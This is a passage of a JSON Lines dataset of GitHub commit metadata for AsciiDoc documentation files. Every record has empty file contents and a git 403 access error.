403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"4273858e4ff8916d850ae08a1c4b61839326ae77","subject":"PLATSERV-184: Quitado un \"the\" sobrante","message":"PLATSERV-184: Quitado un \"the\" sobrante\n","repos":"serenity-devstack\/spring-cloud-services-connector","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/serenity-devstack\/spring-cloud-services-connector.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bfbc829ab265b1ab953320768882fc7877130b43","subject":"Minimal doc for ZestPlugin #259","message":"Minimal doc for 
ZestPlugin #259\n","repos":"werval\/werval,werval\/werval,werval\/werval,werval\/werval","old_file":"io.werval.modules\/io.werval.modules.zest\/src\/doc\/index.adoc","new_file":"io.werval.modules\/io.werval.modules.zest\/src\/doc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/werval\/werval.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e36f9cc419e2fea37e3650cd5f0fde8933af7236","subject":"added documentation file","message":"added documentation file\n","repos":"svenkubiak\/mangooio,svenkubiak\/mangooio,dmarko484\/mangooio,svenkubiak\/mangooio,dmarko484\/mangooio","old_file":"mangooio-core\/src\/main\/documentation\/documentation.asciidoc","new_file":"mangooio-core\/src\/main\/documentation\/documentation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/svenkubiak\/mangooio.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d9de9f834fa699c7766303bace7962a7ffb63fac","subject":"Update 2017-10-28-.adoc","message":"Update 2017-10-28-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-28-.adoc","new_file":"_posts\/2017-10-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"127136e6bfcdeaa3512c5a1dbb80fd7391014307","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b7294607757bf8bbabb6edfb20789d88ff408bc","subject":"Additions to documentation regarding caching functionality","message":"Additions to documentation regarding caching functionality\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f8e45e93553b074d2f782490bb676733d499c35b","subject":"Changed the documentation for XPath extension function external:exec-external(); added new parameter.","message":"Changed the documentation for XPath extension function external:exec-external(); added new parameter.\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"581ece82475e36de31f3dfc1ec2a29ff744d04db","subject":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d60caab1fa486e2ece24d3721d5154e1d3bcea36","subject":"Publish 2016-12-9-IEEE-Day-Story-IEEE-THDC-IHET-SB.adoc","message":"Publish 2016-12-9-IEEE-Day-Story-IEEE-THDC-IHET-SB.adoc","repos":"IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog","old_file":"2016-12-9-IEEE-Day-Story-IEEE-THDC-IHET-SB.adoc","new_file":"2016-12-9-IEEE-Day-Story-IEEE-THDC-IHET-SB.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IEEECompute\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"939e7d320fb90a6d43fd3386a48fbb6b051a4d37","subject":"Update 2017-11-12-.adoc","message":"Update 2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11a7cd34fbb63dc8a8b7378364e57fc1b988e3fb","subject":"readme","message":"readme\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"quarkus\/infinispan-demo\/readme.adoc","new_file":"quarkus\/infinispan-demo\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2da4cc681fc5638fca70cb357368693a49d0092b","subject":"Update 2015-11-19-Ejecutar-comandos-con-listas-de-directorios.adoc","message":"Update 2015-11-19-Ejecutar-comandos-con-listas-de-directorios.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-19-Ejecutar-comandos-con-listas-de-directorios.adoc","new_file":"_posts\/2015-11-19-Ejecutar-comandos-con-listas-de-directorios.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e946d413f49b1e301b483468369c79ca3993bca8","subject":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","message":"Update 
2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"730e7082fcbe4beec6514057fbb3f253c5343dc4","subject":"Update 2016-05-04-Wordpress-Settings-A-P-I.adoc","message":"Update 2016-05-04-Wordpress-Settings-A-P-I.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-05-04-Wordpress-Settings-A-P-I.adoc","new_file":"_posts\/2016-05-04-Wordpress-Settings-A-P-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a69a1e1133e381ab76e68e79c9cbbd52be54db46","subject":"y2b create post McDonald's Made A Boombox???","message":"y2b create post McDonald's Made A Boombox???","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-23-McDonalds-Made-A-Boombox.adoc","new_file":"_posts\/2017-08-23-McDonalds-Made-A-Boombox.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7dba7e56cbbd386cdab2784369a0bc6090d3a0f","subject":"Publish 2016-6-26-first-title.adoc","message":"Publish 2016-6-26-first-title.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-first-title.adoc","new_file":"2016-6-26-first-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1fd87c6c85e6504b01d4d2efe7d3aa42fa7ffd8c","subject":"description update","message":"description update\n\nUpdate formatting\n","repos":"denara\/vaadin-spring-ext","old_file":"vaadin-spring-cdi-properties-generator-maven-plugin\/README.adoc","new_file":"vaadin-spring-cdi-properties-generator-maven-plugin\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/denara\/vaadin-spring-ext.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"944eb7578c4d6e91fd3c79649d4b04b5a0c130fb","subject":"added hint for windows-only","message":"added hint for windows-only\n","repos":"jakubjab\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/manual\/03_task_exportEA.adoc","new_file":"src\/docs\/manual\/03_task_exportEA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested 
URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31ddbcf0bc04d5ab631108b7bffef8da26ce7ee6","subject":"docs: add 1.5.0 release note for disk failures","message":"docs: add 1.5.0 release note for disk failures\n\nChange-Id: I3ad45527dc32a4946c817ddbef2149433f3b5b89\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/7856\nReviewed-by: Dan Burkert <4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\nTested-by: Dan Burkert <4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\n","repos":"EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ff1e9987f48d00c42ee4c8530017f3da49daf9ef","subject":"Update 2019-01-13-.adoc","message":"Update 2019-01-13-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-13-.adoc","new_file":"_posts\/2019-01-13-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41801a8301835bfde9540fc266ddd6b9bcd94a86","subject":"Shorten the links in the component table to make more room for the description.","message":"Shorten the links in the component table to make more room for the 
description.\n","repos":"pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,ppalaga\/hawkular.github.io,lzoubek\/hawkular.github.io,jotak\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,metlos\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,metlos\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,metlos\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,ppalaga\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c5442ed5d130f45397f9697b949f55fa627776f","subject":"Update 2015-03-16-HTML-table-Responsive-Tabellen-mit-CSS.adoc","message":"Update 2015-03-16-HTML-table-Responsive-Tabellen-mit-CSS.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-03-16-HTML-table-Responsive-Tabellen-mit-CSS.adoc","new_file":"_posts\/2015-03-16-HTML-table-Responsive-Tabellen-mit-CSS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7e92e43aa0c8b85c50812e755a963f704dbc6c3","subject":"Forgot push to remote","message":"Forgot push to remote\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"18bbce3ce9d5a2d971b8230bb651c4ca96756e0d","subject":"Lost passphrase","message":"Lost passphrase\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"40a7010e6bb587f526525f998aef3c83f0365efc","subject":"Update 2016-03-14-.adoc","message":"Update 
2016-03-14-.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-03-14-.adoc","new_file":"_posts\/2016-03-14-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05909b3bed05bb0e2b128a066a432d9c58718729","subject":"Deleted _posts\/2015-02-22-The-first-post.adoc","message":"Deleted _posts\/2015-02-22-The-first-post.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-02-22-The-first-post.adoc","new_file":"_posts\/2015-02-22-The-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c926334c8c7c2960150c951c45d7fe98cdb6999","subject":"Update 2016-02-08-Install-Kibana.adoc","message":"Update 2016-02-08-Install-Kibana.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2016-02-08-Install-Kibana.adoc","new_file":"_posts\/2016-02-08-Install-Kibana.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f979fd499138300e3f8f5e513dbc871e68b4b68b","subject":"Update 2016-05-06-Welcome-Pepper.adoc","message":"Update 2016-05-06-Welcome-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdc380901d0a0a80787933785c9d647ec7c97f19","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dc3568b56a5f3159e74132b46dcdc9c1351097e","subject":"Adding release notes for release of revapi_build revapi revapi_maven_utils revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_maven_plugin revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml","message":"Adding release notes for release of revapi_build revapi revapi_maven_utils revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_maven_plugin revapi_reporter_json revapi_reporter_text revapi_standalone 
revapi_yaml\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210108-releases.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210108-releases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac6a9c484810d898890edc8bdcc4f4ada1962721","subject":"Update 2016-07-12-Backup-para-o-Google-Drive.adoc","message":"Update 2016-07-12-Backup-para-o-Google-Drive.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2016-07-12-Backup-para-o-Google-Drive.adoc","new_file":"_posts\/2016-07-12-Backup-para-o-Google-Drive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3357a7ab01a77d7ffca60206839e3c0edf5c9afe","subject":"Update 2017-04-15-Wraith32-BL-Hli-32-unboxed.adoc","message":"Update 2017-04-15-Wraith32-BL-Hli-32-unboxed.adoc","repos":"OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io","old_file":"_posts\/2017-04-15-Wraith32-BL-Hli-32-unboxed.adoc","new_file":"_posts\/2017-04-15-Wraith32-BL-Hli-32-unboxed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OctavioMaia\/octaviomaia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6b99e0822c78c633e568ef8c44ec22c0d18b232","subject":"Early 2021 release (#376)","message":"Early 2021 release (#376)\n\n* Early 2021 release\r\n\r\n* Fix typos\r\n\r\n* revise changes section to include other breaking changes\r\n\r\n* Document CLJS-3235, not CLJS-3233\r\n\r\n* Don\u2019t refer to foreign (npm example). 
Other copyedits.\r\n\r\n* Fix typo\r\n\r\n* Fix typo\r\n\r\n* Move to actual date\r\n\r\n* Set date in file\r\n\r\n* update date\r\n\r\nCo-authored-by: David Nolen <229f9ffc72c317feebf3a3f0b8d063b27d44a01e@gmail.com>","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2021-04-06-release.adoc","new_file":"content\/news\/2021-04-06-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5a5c24d95f84622bf8e4b4f18fd77c8909b7328f","subject":"Update 2011-03-10-PHP-MySQL-and-UTF-8.adoc","message":"Update 2011-03-10-PHP-MySQL-and-UTF-8.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2011-03-10-PHP-MySQL-and-UTF-8.adoc","new_file":"_posts\/2011-03-10-PHP-MySQL-and-UTF-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8440a2cc6b85635a47265013a3c38e20023e5660","subject":"Update 2016-07-29-My-Zimbabwean-Queen.adoc","message":"Update 2016-07-29-My-Zimbabwean-Queen.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-07-29-My-Zimbabwean-Queen.adoc","new_file":"_posts\/2016-07-29-My-Zimbabwean-Queen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a36ebd16532765481755d014afd72e4019bfb99a","subject":"Update 2018-03-12-P-H-Per-Golang.adoc","message":"Update 2018-03-12-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-12-P-H-Per-Golang.adoc","new_file":"_posts\/2018-03-12-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"413df52b6bf03ed4bf7deef9addb0be382094393","subject":"added decision to use JUnit 5","message":"added decision to use JUnit 5\n","repos":"Drakojin\/livingdoc2,Drakojin\/livingdoc2,LivingDoc\/livingdoc,testIT-LivingDoc\/livingdoc2,Drakojin\/livingdoc2,bitterblue\/livingdoc2,LivingDoc\/livingdoc,bitterblue\/livingdoc2,pkleimann\/livingdoc,testIT-LivingDoc\/livingdoc2,pkleimann\/livingdoc,bitterblue\/livingdoc2,pkleimann\/livingdoc,pkleimann\/livingdoc2,LivingDoc\/livingdoc,pkleimann\/livingdoc2","old_file":"doc\/decisions\/adr-004-use-junit5.adoc","new_file":"doc\/decisions\/adr-004-use-junit5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitterblue\/livingdoc2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e812e0c5f89e1fb67f56096110a73216a99bcd10","subject":"Update 2016-03-06-Test-darticle.adoc","message":"Update 
2016-03-06-Test-darticle.adoc","repos":"flavienliger\/flavienliger.github.io,flavienliger\/flavienliger.github.io,flavienliger\/flavienliger.github.io,flavienliger\/flavienliger.github.io","old_file":"_posts\/2016-03-06-Test-darticle.adoc","new_file":"_posts\/2016-03-06-Test-darticle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flavienliger\/flavienliger.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2bf28bffee174cc729917442a8c0a1dbab868ed","subject":"Renamed '_posts\/2017-10-20-Severin-Tagliante-Saracino.adoc' to '_posts\/2017-10-20-My-first-post.adoc'","message":"Renamed '_posts\/2017-10-20-Severin-Tagliante-Saracino.adoc' to '_posts\/2017-10-20-My-first-post.adoc'","repos":"severin31\/severin31.github.io,severin31\/severin31.github.io,severin31\/severin31.github.io,severin31\/severin31.github.io","old_file":"_posts\/2017-10-20-My-first-post.adoc","new_file":"_posts\/2017-10-20-My-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/severin31\/severin31.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65cf8d1c46cfdb6378b41e57a2267a8854ed608d","subject":"Docs: Add Oracle doc link to getting started page","message":"Docs: Add Oracle doc link to getting started page\n\nSince there is a recommended version of JDK, it would be helpful to provide a link to the Oracle documentation. Since there are many versions of Java, those that are new or infrequent users of Java would find the link helpful. Thanks!\n\nCloses #11792\n","repos":"andrejserafim\/elasticsearch,F0lha\/elasticsearch,kevinkluge\/elasticsearch,kevinkluge\/elasticsearch,nezirus\/elasticsearch,wenpos\/elasticsearch,mnylen\/elasticsearch,onegambler\/elasticsearch,weipinghe\/elasticsearch,hydro2k\/elasticsearch,ivansun1010\/elasticsearch,lchennup\/elasticsearch,schonfeld\/elasticsearch,jeteve\/elasticsearch,Rygbee\/elasticsearch,nazarewk\/elasticsearch,pablocastro\/elasticsearch,easonC\/elasticsearch,mjhennig\/elasticsearch,kunallimaye\/elasticsearch,markllama\/elasticsearch,kalimatas\/elasticsearch,wangyuxue\/elasticsearch,GlenRSmith\/elasticsearch,phani546\/elasticsearch,snikch\/elasticsearch,lightslife\/elasticsearch,yongminxia\/elasticsearch,lmtwga\/elasticsearch,djschny\/elasticsearch,kenshin233\/elasticsearch,coding0011\/elasticsearch,mjason3\/elasticsearch,fekaputra\/elasticsearch,yynil\/elasticsearch,ZTE-PaaS\/elasticsearch,EasonYi\/elasticsearch,Uiho\/elasticsearch,Kakakakakku\/elasticsearch,fred84\/elasticsearch,kimimj\/elasticsearch,aglne\/elasticsearch,kcompher\/elasticsearch,YosuaMichael\/elasticsearch,hafkensite\/elasticsearch,elancom\/elasticsearch,JackyMai\/elasticsearch,MisterAndersen\/elasticsearch,henakamaMSFT\/elasticsearch,MisterAndersen\/elasticsearch,artnowo\/elasticsearch,qwerty4030\/elasticsearch,episerver\/elasticsearch,lydonchandra\/elasticsearch,himanshuag\/elasticsearch,xingguang2013\/elasticsearch,winstonewert\/elasticsearch,Siddartha07\/elasticsearch,Kakakakakku\/elasticsearch,huanzhong\/elasticsearch,ZTE-PaaS\/elasticsearch,mapr\/elasticsearch,Ash